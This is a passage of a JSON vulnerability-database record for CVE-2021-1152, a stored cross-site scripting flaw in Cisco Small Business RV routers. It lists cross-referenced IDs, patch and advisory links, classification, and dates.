            "id": "CNNVD-202101-1026"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1152"
          }
        ]
      },
      "id": "VAR-202101-0794",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374206"
          }
        ],
        "trust": 1.363373685
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:34:59.648000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-stored-xss-LPTQ3EQC",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-stored-xss-LPTQ3EQC"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W cross-site scripting vulnerability (CNVD-2021-41162)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272206"
          },
          {
            "title": "Multiple Cisco Fixes for product cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139429"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1026"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1152"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-stored-xss-lptq3eqc"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1152"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0141/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1026"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1152"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1026"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1152"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374206"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1026"
          },
          {
            "date": "2021-01-13T22:15:15.303000",
            "db": "NVD",
            "id": "CVE-2021-1152"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41162"
          },
          {
            "date": "2021-01-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374206"
          },
          {
            "date": "2021-09-29T05:47:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          },
          {
            "date": "2021-01-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1026"
          },
          {
            "date": "2024-11-21T05:43:42.203000",
            "db": "NVD",
            "id": "CVE-2021-1152"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1026"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Cross-site scripting vulnerabilities in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002669"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1026"
          }
        ],
        "trust": 0.6
      }
    }